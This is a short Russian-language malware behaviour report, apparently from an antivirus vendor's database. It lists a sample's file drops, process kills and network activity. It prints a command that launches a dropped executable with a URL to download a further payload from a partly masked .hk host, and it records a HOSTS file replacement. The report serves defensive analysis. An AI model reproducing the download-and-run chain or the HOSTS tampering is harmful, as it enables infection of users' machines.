Техническая информация
Вредоносные функции
Запускает на исполнение
- '%WINDIR%\syswow64\taskkill.exe' /im "praetorian.exe"
Изменения в файловой системе
Создает следующие файлы
- C:\новая папка\install.cmd
- C:\новая папка\drv.dll
- C:\новая папка\win.exe
Удаляет следующие файлы
- <DRIVERS>\etc\hosts
Подменяет файл HOSTS.
Сетевая активность
Подключается к
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
UDP
- DNS ASK cr####.micro-pak.hk
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Другое
Ищет следующие окна
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- 'C:\новая папка\win.exe' http://cru-45.micro-pak.hk/tt.exe
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c ""C:\Новая папка\install.cmd" " (со скрытым окном)
- '%WINDIR%\syswow64\tasklist.exe'
- '%WINDIR%\syswow64\find.exe' /i "win.exe"
